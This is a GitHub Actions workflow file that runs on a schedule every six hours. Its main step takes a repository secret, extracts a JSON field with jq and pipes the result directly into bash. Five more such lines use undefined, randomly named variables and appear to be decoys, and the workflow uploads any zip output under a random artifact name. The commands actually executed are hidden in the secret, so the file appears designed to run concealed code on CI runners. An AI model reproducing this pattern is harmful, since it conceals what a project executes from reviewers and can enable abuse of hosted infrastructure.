name: Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '24 0,6,12,18 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  runner:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          ufai8052: ${{ secrets.ufai8052 }}
        run: |
          printf '%s' "$ufai8052" | jq -r .r80 | /bin/bash
          printf '%s' "$goan4" | jq -r .v99 | /bin/bash
          echo $o9 | jq -r .ourr06 | /bin/bash
          echo $isu053 | jq -r .yj8606 | /bin/bash
          printf '%s' "$s4608" | jq -r .yn07 | /bin/bash
          echo $czxzx29336 | jq -r .taegl1 | /bin/bash

      - name: Archive results
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: K1yBwsSy
          path: "*.zip"
          retention-days: 1
